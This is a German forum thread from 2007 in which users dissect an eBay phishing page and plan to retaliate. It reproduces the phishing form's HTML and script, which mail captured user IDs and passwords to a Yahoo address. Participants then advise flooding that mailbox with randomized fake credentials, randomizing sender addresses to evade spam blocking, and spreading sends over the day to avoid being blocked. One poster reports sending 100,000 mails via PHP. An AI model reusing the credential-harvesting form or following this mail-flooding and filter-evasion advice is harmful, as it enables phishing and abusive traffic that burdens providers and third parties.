Brauche einen Bot


Ich suche ein Script, mit dem ich so ein paar blöden Phishern mal etwas die Tour vermasseln kann.

Unten ist ein Link zu so einer Seite.

Vorsicht: Seite will Ebay Passwörter haben, also nichts dort eintragen!
http://slupsk.slp.vectranet.pl/~dominik/.r...om/redirect.htm

Da dort keine Zeitsperre drauf ist, würde ich dort gerne sehr schnell das Formular mit Werten bestücken und sofort abschicken. Da er die Werte sicher in einer Datenbank speichert, bekommt man die sicher schnell zum Überlauf.

Zwar ganz gut gemacht, aber die Adresse in der Statuszeile zeigt schon wo es hingeht.
Wer möchte kann ihm ja ein paar nette Einträge mit Doofkopp oder so hinterlegen.

Sehe gerade, der geht per Mail Script an eine bestimmt Adresse. Heißt, da kann man ihm das Mailfach bei Yahoo zuknallen.

Bearbeitet von tom-kuehn am 12.06.2007 13:40:26


So, die Form dahinter sieht so aus:

CODE

<form name="frmcadastro" action="http://www2.fiberbit.net/form/mailto.cgi" method="post" enctype="x-www-form-urlencoded">
<input name="Mail_From" value="Yahoo" type="hidden">
<input name="Mail_To" value="gingerregnigg3@yahoo.com" type="hidden">
<input name="Mail_Subject" type="hidden">

<script language=javascript>
function check(form) {
var user = document.frmcadastro.userid.value;
var parola = document.frmcadastro.pass.value;
document.frmcadastro.Mail_Subject.value = user + " && " + parola;
form.submit();}
</script>

<input name="Next_Page" value="http://feedback.ebay.com/ws/eBayISAPI.dll?ViewFeedback&userid=automony " type="hidden">
<input name="SMAUTHREASON" value="0" type="hidden">
<input name="TARGET" value="http://pages.ebay.com/q" type="hidden">
<INPUT tabIndex=1 maxLength=64 size=27 name=userid>
<INPUT tabIndex=2 type=password maxLength=64 size=27 name=pass>
<INPUT tabIndex=3 type=submit onclick="check(this.form); return false;" value="Sicheres Einloggen >">
<INPUT tabIndex=4 type=checkbox value=1 name=keepMeSignInOption>

</form>


Wie bringe ich nun die Daten an das cgi Script?

Kannst du eventuell etwas mit dem Quelltext anfangen ?

Den könnte ich dir geben, ls


Zitat (Archimeda1 @ 12.06.2007 15:04:36)
Kannst du eventuell etwas mit dem Quelltext anfangen ?

Den könnte ich dir geben, ls

Nun ja, ist ein Post. Ich denke mal, es müssen alle Parameter mit rein also etwa:

http://www2.fiberbit.net/form/mailto.cgi?M...eSignInOption=1

So in etwa, geht aber nicht.

Wenn ich einen funktionierenden Link hätte. könnte ich den per PHP immer wieder aufrufen, aber ich bekomme immer nur eine Fehlermeldung.

Bearbeitet von tom-kuehn am 12.06.2007 15:19:17

Die Seite wird bei mir leider nicht angezeigt. Im Quelltext kannst du aber erkennen, woher es stammt.


Quelltext:

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta content="text/html; charset=ISO-8859-1"
http-equiv="content-type">
<title></title>
</head>
<body>
&lt;form name="frmcadastro"
action="http://www2.fiberbit.net/form/mailto.cgi&quot; method="post"
enctype="x-www-form-urlencoded"&gt;<br>
&lt;input name="Mail_From" value="Yahoo" type="hidden"&gt;<br>
&lt;input name="Mail_To" value="gingerregnigg3@yahoo.com"
type="hidden"&gt;<br>
&lt;input name="Mail_Subject" type="hidden"&gt;<br>
<br>
&lt;script language=javascript&gt;<br>
function check(form) {<br>
var user = document.frmcadastro.userid.value;<br>
var parola = document.frmcadastro.pass.value;<br>
document.frmcadastro.Mail_Subject.value = user + " &amp;&amp; "
+ parola;<br>
form.submit();}<br>
&lt;/script&gt;<br>
<br>
&lt;input name="Next_Page"
value="http://feedback.ebay.com/ws/eBayISAPI.dll?ViewFeedback&amp;userid=automony
" type="hidden"&gt;<br>
&lt;input name="SMAUTHREASON" value="0" type="hidden"&gt;<br>
&lt;input name="TARGET" value="http://pages.ebay.com/q&quot;
type="hidden"&gt;<br>
&lt;INPUT tabIndex=1 maxLength=64 size=27 name=userid&gt;<br>
&lt;INPUT tabIndex=2 type=password maxLength=64 size=27
name=pass&gt;<br>
&lt;INPUT tabIndex=3 type=submit onclick="check(this.form); return
false;" value="Sicheres Einloggen &gt;"&gt;<br>
&lt;INPUT tabIndex=4 type=checkbox value=1
name=keepMeSignInOption&gt;<br>
<br>
&lt;/form&gt;<br>
</body>
</html>

Mir ist schon klar was dort passiert: Die Form wird samt Inhalten an das cgi übergeben. UserID und Passwort aus den Inputs werden als Mail_Subject übergeben und das cgi wird sehr wahrscheinlich an gingerregnigg3@yahoo.com gemailt.

Dummerweise ist mein Chinesisch etwas eingerostet, fiberbit sieht seht asiatisch aus und da komme ich nicht weiter.


Wie, du kannst kein chinesisch ??? :rolleyes:

In meinem Forum kannst du das online erlernen *bg

:blumen:


Auch wenn ich voll hinter Dir stehe tom-kuehn. Das was Du versuchst ist ne Art Sachbeschädigung. Mir fällt grad das richtige Wort nicht ein. Aber es würde den Tatbestand einer Straftat erfüllen. Ok, so ein Typ würde Dich wohl nicht anzeigen. Aber behalt das mal im Hinterkopf.

Die Form, die Du gepostet hast versendet die Daten als POST. Das heißt, Du kannst eben keinen Link zusammenbasteln, wie Du es versucht hast. Denn das wäre die GET Methode. Was Du machen kannst wäre folgendes:
Du überspringst einfach diese blöde Form, und sendest eine unendliche Zahl an Mails an diese Adresse, mit dem Subjekt "username&&passwort" wobei die beiden Worte aus nem Zufallsgenerator kommen.
Ich denke nämlich, die Seite bei fiberbit macht nix anderes, als die Mail zu erstellen, und zu versenden.

PS: Vergiß nicht, daß Du Deine absende-mailadresse auch veränderst, und evtl durch nen zufallsgenerator jagst. Sonst bockt er Dich einfach als Spam.

Bearbeitet von Wyvern am 13.06.2007 10:00:46


Zitat (Wyvern @ 13.06.2007 09:59:09)
Aber es würde den Tatbestand einer Straftat erfüllen. Ok, so ein Typ würde Dich wohl nicht anzeigen.

Ob Spammails verschicken eine Straftat ist? Weiß nicht, aber ich denke wirklich nicht, dass er mich anzeigen würde.

Ich habs mal mit Mail versucht. Per php Script erstmal 100.000 Stück, die gingen zumindest durch.

Das Problem ist nun, daß das Versenden der Mails Bandbreite und Rechnerleistung bei den Providern frißt. Das wäre durchaus auch ne Art Sachbeschädigung. Wenn die wollen, dann könnten sie Dir evtl auf die Pfoten klopfen. Aber nach dem, was ich so täglich an Spam bekomme sind Deine 100.000 Mails nicht so wirklich schlimm.

Du könntest Dir jetzt noch den Spaß machen, und diese Mails nicht als Block, sondern Zeitverzögert über den ganzen Tag verteilt versenden. Dann kann er auch nicht einfach nen Zeitraum blocken.



Kostenloser Newsletter